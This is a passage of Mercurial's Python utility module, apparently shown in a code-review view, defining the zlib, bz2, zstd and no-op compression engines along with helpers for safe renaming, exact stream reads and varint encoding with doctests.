3567 3567 """
3568 3568 return 'gzip', 'GZ'
3569 3569
3570 3570 def wireprotosupport(self):
3571 3571 return compewireprotosupport('zlib', 20, 20)
3572 3572
3573 3573 def revlogheader(self):
3574 3574 return 'x'
3575 3575
3576 3576 def compressstream(self, it, opts=None):
3577 3577 opts = opts or {}
3578 3578
3579 3579 z = zlib.compressobj(opts.get('level', -1))
3580 3580 for chunk in it:
3581 3581 data = z.compress(chunk)
3582 3582 # Not all calls to compress emit data. It is cheaper to inspect
3583 3583 # here than to feed empty chunks through generator.
3584 3584 if data:
3585 3585 yield data
3586 3586
3587 3587 yield z.flush()
3588 3588
3589 3589 def decompressorreader(self, fh):
3590 3590 def gen():
3591 3591 d = zlib.decompressobj()
3592 3592 for chunk in filechunkiter(fh):
3593 3593 while chunk:
3594 3594 # Limit output size to limit memory.
3595 3595 yield d.decompress(chunk, 2 ** 18)
3596 3596 chunk = d.unconsumed_tail
3597 3597
3598 3598 return chunkbuffer(gen())
3599 3599
3600 3600 class zlibrevlogcompressor(object):
3601 3601 def compress(self, data):
3602 3602 insize = len(data)
3603 3603 # Caller handles empty input case.
3604 3604 assert insize > 0
3605 3605
3606 3606 if insize < 44:
3607 3607 return None
3608 3608
3609 3609 elif insize <= 1000000:
3610 3610 compressed = zlib.compress(data)
3611 3611 if len(compressed) < insize:
3612 3612 return compressed
3613 3613 return None
3614 3614
3615 3615 # zlib makes an internal copy of the input buffer, doubling
3616 3616 # memory usage for large inputs. So do streaming compression
3617 3617 # on large inputs.
3618 3618 else:
3619 3619 z = zlib.compressobj()
3620 3620 parts = []
3621 3621 pos = 0
3622 3622 while pos < insize:
3623 3623 pos2 = pos + 2**20
3624 3624 parts.append(z.compress(data[pos:pos2]))
3625 3625 pos = pos2
3626 3626 parts.append(z.flush())
3627 3627
3628 3628 if sum(map(len, parts)) < insize:
3629 3629 return ''.join(parts)
3630 3630 return None
3631 3631
3632 3632 def decompress(self, data):
3633 3633 try:
3634 3634 return zlib.decompress(data)
3635 3635 except zlib.error as e:
3636 3636 raise error.RevlogError(_('revlog decompress error: %s') %
3637 3637 str(e))
3638 3638
3639 3639 def revlogcompressor(self, opts=None):
3640 3640 return self.zlibrevlogcompressor()
3641 3641
3642 3642 compengines.register(_zlibengine())
3643 3643
3644 3644 class _bz2engine(compressionengine):
3645 3645 def name(self):
3646 3646 return 'bz2'
3647 3647
3648 3648 def bundletype(self):
3649 3649 """An algorithm that produces smaller bundles than ``gzip``.
3650 3650
3651 3651 All Mercurial clients should support this format.
3652 3652
3653 3653 This engine will likely produce smaller bundles than ``gzip`` but
3654 3654 will be significantly slower, both during compression and
3655 3655 decompression.
3656 3656
3657 3657 If available, the ``zstd`` engine can yield similar or better
3658 3658 compression at much higher speeds.
3659 3659 """
3660 3660 return 'bzip2', 'BZ'
3661 3661
3662 3662 # We declare a protocol name but don't advertise by default because
3663 3663 # it is slow.
3664 3664 def wireprotosupport(self):
3665 3665 return compewireprotosupport('bzip2', 0, 0)
3666 3666
3667 3667 def compressstream(self, it, opts=None):
3668 3668 opts = opts or {}
3669 3669 z = bz2.BZ2Compressor(opts.get('level', 9))
3670 3670 for chunk in it:
3671 3671 data = z.compress(chunk)
3672 3672 if data:
3673 3673 yield data
3674 3674
3675 3675 yield z.flush()
3676 3676
3677 3677 def decompressorreader(self, fh):
3678 3678 def gen():
3679 3679 d = bz2.BZ2Decompressor()
3680 3680 for chunk in filechunkiter(fh):
3681 3681 yield d.decompress(chunk)
3682 3682
3683 3683 return chunkbuffer(gen())
3684 3684
3685 3685 compengines.register(_bz2engine())
3686 3686
3687 3687 class _truncatedbz2engine(compressionengine):
3688 3688 def name(self):
3689 3689 return 'bz2truncated'
3690 3690
3691 3691 def bundletype(self):
3692 3692 return None, '_truncatedBZ'
3693 3693
3694 3694 # We don't implement compressstream because it is hackily handled elsewhere.
3695 3695
3696 3696 def decompressorreader(self, fh):
3697 3697 def gen():
3698 3698 # The input stream doesn't have the 'BZ' header. So add it back.
3699 3699 d = bz2.BZ2Decompressor()
3700 3700 d.decompress('BZ')
3701 3701 for chunk in filechunkiter(fh):
3702 3702 yield d.decompress(chunk)
3703 3703
3704 3704 return chunkbuffer(gen())
3705 3705
3706 3706 compengines.register(_truncatedbz2engine())
3707 3707
3708 3708 class _noopengine(compressionengine):
3709 3709 def name(self):
3710 3710 return 'none'
3711 3711
3712 3712 def bundletype(self):
3713 3713 """No compression is performed.
3714 3714
3715 3715 Use this compression engine to explicitly disable compression.
3716 3716 """
3717 3717 return 'none', 'UN'
3718 3718
3719 3719 # Clients always support uncompressed payloads. Servers don't because
3720 3720 # unless you are on a fast network, uncompressed payloads can easily
3721 3721 # saturate your network pipe.
3722 3722 def wireprotosupport(self):
3723 3723 return compewireprotosupport('none', 0, 10)
3724 3724
3725 3725 # We don't implement revlogheader because it is handled specially
3726 3726 # in the revlog class.
3727 3727
3728 3728 def compressstream(self, it, opts=None):
3729 3729 return it
3730 3730
3731 3731 def decompressorreader(self, fh):
3732 3732 return fh
3733 3733
3734 3734 class nooprevlogcompressor(object):
3735 3735 def compress(self, data):
3736 3736 return None
3737 3737
3738 3738 def revlogcompressor(self, opts=None):
3739 3739 return self.nooprevlogcompressor()
3740 3740
3741 3741 compengines.register(_noopengine())
3742 3742
3743 3743 class _zstdengine(compressionengine):
3744 3744 def name(self):
3745 3745 return 'zstd'
3746 3746
3747 3747 @propertycache
3748 3748 def _module(self):
3749 3749 # Not all installs have the zstd module available. So defer importing
3750 3750 # until first access.
3751 3751 try:
3752 3752 from . import zstd
3753 3753 # Force delayed import.
3754 3754 zstd.__version__
3755 3755 return zstd
3756 3756 except ImportError:
3757 3757 return None
3758 3758
3759 3759 def available(self):
3760 3760 return bool(self._module)
3761 3761
3762 3762 def bundletype(self):
3763 3763 """A modern compression algorithm that is fast and highly flexible.
3764 3764
3765 3765 Only supported by Mercurial 4.1 and newer clients.
3766 3766
3767 3767 With the default settings, zstd compression is both faster and yields
3768 3768 better compression than ``gzip``. It also frequently yields better
3769 3769 compression than ``bzip2`` while operating at much higher speeds.
3770 3770
3771 3771 If this engine is available and backwards compatibility is not a
3772 3772 concern, it is likely the best available engine.
3773 3773 """
3774 3774 return 'zstd', 'ZS'
3775 3775
3776 3776 def wireprotosupport(self):
3777 3777 return compewireprotosupport('zstd', 50, 50)
3778 3778
3779 3779 def revlogheader(self):
3780 3780 return '\x28'
3781 3781
3782 3782 def compressstream(self, it, opts=None):
3783 3783 opts = opts or {}
3784 3784 # zstd level 3 is almost always significantly faster than zlib
3785 3785 # while providing no worse compression. It strikes a good balance
3786 3786 # between speed and compression.
3787 3787 level = opts.get('level', 3)
3788 3788
3789 3789 zstd = self._module
3790 3790 z = zstd.ZstdCompressor(level=level).compressobj()
3791 3791 for chunk in it:
3792 3792 data = z.compress(chunk)
3793 3793 if data:
3794 3794 yield data
3795 3795
3796 3796 yield z.flush()
3797 3797
3798 3798 def decompressorreader(self, fh):
3799 3799 zstd = self._module
3800 3800 dctx = zstd.ZstdDecompressor()
3801 3801 return chunkbuffer(dctx.read_from(fh))
3802 3802
3803 3803 class zstdrevlogcompressor(object):
3804 3804 def __init__(self, zstd, level=3):
3805 3805 # Writing the content size adds a few bytes to the output. However,
3806 3806 # it allows decompression to be more optimal since we can
3807 3807 # pre-allocate a buffer to hold the result.
3808 3808 self._cctx = zstd.ZstdCompressor(level=level,
3809 3809 write_content_size=True)
3810 3810 self._dctx = zstd.ZstdDecompressor()
3811 3811 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 3812 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813 3813
3814 3814 def compress(self, data):
3815 3815 insize = len(data)
3816 3816 # Caller handles empty input case.
3817 3817 assert insize > 0
3818 3818
3819 3819 if insize < 50:
3820 3820 return None
3821 3821
3822 3822 elif insize <= 1000000:
3823 3823 compressed = self._cctx.compress(data)
3824 3824 if len(compressed) < insize:
3825 3825 return compressed
3826 3826 return None
3827 3827 else:
3828 3828 z = self._cctx.compressobj()
3829 3829 chunks = []
3830 3830 pos = 0
3831 3831 while pos < insize:
3832 3832 pos2 = pos + self._compinsize
3833 3833 chunk = z.compress(data[pos:pos2])
3834 3834 if chunk:
3835 3835 chunks.append(chunk)
3836 3836 pos = pos2
3837 3837 chunks.append(z.flush())
3838 3838
3839 3839 if sum(map(len, chunks)) < insize:
3840 3840 return ''.join(chunks)
3841 3841 return None
3842 3842
3843 3843 def decompress(self, data):
3844 3844 insize = len(data)
3845 3845
3846 3846 try:
3847 3847 # This was measured to be faster than other streaming
3848 3848 # decompressors.
3849 3849 dobj = self._dctx.decompressobj()
3850 3850 chunks = []
3851 3851 pos = 0
3852 3852 while pos < insize:
3853 3853 pos2 = pos + self._decompinsize
3854 3854 chunk = dobj.decompress(data[pos:pos2])
3855 3855 if chunk:
3856 3856 chunks.append(chunk)
3857 3857 pos = pos2
3858 3858 # Frame should be exhausted, so no finish() API.
3859 3859
3860 3860 return ''.join(chunks)
3861 3861 except Exception as e:
3862 3862 raise error.RevlogError(_('revlog decompress error: %s') %
3863 3863 str(e))
3864 3864
3865 3865 def revlogcompressor(self, opts=None):
3866 3866 opts = opts or {}
3867 3867 return self.zstdrevlogcompressor(self._module,
3868 3868 level=opts.get('level', 3))
3869 3869
3870 3870 compengines.register(_zstdengine())
3871 3871
3872 3872 def bundlecompressiontopics():
3873 3873 """Obtains a list of available bundle compressions for use in help."""
3874 3874 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 3875 items = {}
3876 3876
3877 3877 # We need to format the docstring. So use a dummy object/type to hold it
3878 3878 # rather than mutating the original.
3879 3879 class docobject(object):
3880 3880 pass
3881 3881
3882 3882 for name in compengines:
3883 3883 engine = compengines[name]
3884 3884
3885 3885 if not engine.available():
3886 3886 continue
3887 3887
3888 3888 bt = engine.bundletype()
3889 3889 if not bt or not bt[0]:
3890 3890 continue
3891 3891
3892 3892 doc = pycompat.sysstr('``%s``\n %s') % (
3893 3893 bt[0], engine.bundletype.__doc__)
3894 3894
3895 3895 value = docobject()
3896 3896 value.__doc__ = doc
3897 3897 value._origdoc = engine.bundletype.__doc__
3898 3898 value._origfunc = engine.bundletype
3899 3899
3900 3900 items[bt[0]] = value
3901 3901
3902 3902 return items
3903 3903
3904 3904 i18nfunctions = bundlecompressiontopics().values()
3905 3905
3906 3906 # convenient shortcut
3907 3907 dst = debugstacktrace
3908 3908
3909 3909 def safename(f, tag, ctx, others=None):
3910 3910 """
3911 3911 Generate a name that it is safe to rename f to in the given context.
3912 3912
3913 3913 f: filename to rename
3914 3914 tag: a string tag that will be included in the new name
3915 3915 ctx: a context, in which the new name must not exist
3916 3916 others: a set of other filenames that the new name must not be in
3917 3917
3918 3918 Returns a file name of the form oldname~tag[~number] which does not exist
3919 3919 in the provided context and is not in the set of other names.
3920 3920 """
3921 3921 if others is None:
3922 3922 others = set()
3923 3923
3924 3924 fn = '%s~%s' % (f, tag)
3925 3925 if fn not in ctx and fn not in others:
3926 3926 return fn
3927 3927 for n in itertools.count(1):
3928 3928 fn = '%s~%s~%s' % (f, tag, n)
3929 3929 if fn not in ctx and fn not in others:
3930 3930 return fn
3931 3931
3932 3932 def readexactly(stream, n):
3933 3933 '''read n bytes from stream.read and abort if less was available'''
3934 3934 s = stream.read(n)
3935 3935 if len(s) < n:
3936 3936 raise error.Abort(_("stream ended unexpectedly"
3937 3937 " (got %d bytes, expected %d)")
3938 3938 % (len(s), n))
3939 3939 return s
3940 3940
3941 3941 def uvarintencode(value):
3942 3942 """Encode an unsigned integer value to a varint.
3943 3943
3944 3944 A varint is a variable length integer of 1 or more bytes. Each byte
3945 3945 except the last has the most significant bit set. The lower 7 bits of
3946 3946 each byte store the 2's complement representation, least significant group
3947 3947 first.
3948 3948
3949 3949 >>> uvarintencode(0)
3950 3950 '\\x00'
3951 3951 >>> uvarintencode(1)
3952 3952 '\\x01'
3953 3953 >>> uvarintencode(127)
3954 3954 '\\x7f'
3955 3955 >>> uvarintencode(1337)
3956 3956 '\\xb9\\n'
3957 3957 >>> uvarintencode(65536)
3958 3958 '\\x80\\x80\\x04'
3959 3959 >>> uvarintencode(-1)
3960 3960 Traceback (most recent call last):
3961 3961 ...
3962 3962 ProgrammingError: negative value for uvarint: -1
3963 3963 """
3964 3964 if value < 0:
3965 3965 raise error.ProgrammingError('negative value for uvarint: %d'
3966 3966 % value)
3967 3967 bits = value & 0x7f
3968 3968 value >>= 7
3969 3969 bytes = []
3970 3970 while value:
3971 3971 bytes.append(pycompat.bytechr(0x80 | bits))
3972 3972 bits = value & 0x7f
3973 3973 value >>= 7
3974 3974 bytes.append(pycompat.bytechr(bits))
3975 3975
3976 3976 return ''.join(bytes)
3977 3977
3978 3978 def uvarintdecodestream(fh):
3979 3979 """Decode an unsigned variable length integer from a stream.
3980 3980
3981 3981 The passed argument is anything that has a ``.read(N)`` method.
3982 3982
3983 3983 >>> try:
3984 3984 ... from StringIO import StringIO as BytesIO
3985 3985 ... except ImportError:
3986 3986 ... from io import BytesIO
3987 3987 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 3988 0
3989 3989 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 3990 1
3991 3991 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 3992 127
3993 3993 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 3994 1337
3995 3995 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 3996 65536
3997 3997 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 3998 Traceback (most recent call last):
3999 3999 ...
4000 4000 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 4001 """
4002 4002 result = 0
4003 4003 shift = 0
4004 4004 while True:
4005 4005 byte = ord(readexactly(fh, 1))
4006 4006 result |= ((byte & 0x7f) << shift)
4007 4007 if not (byte & 0x80):
4008 4008 return result
4009 4009 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now